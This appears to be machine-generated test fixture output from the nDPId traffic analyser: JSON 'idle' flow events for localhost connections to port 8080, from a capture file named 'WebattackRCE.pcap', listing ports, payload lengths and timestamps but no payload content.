-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 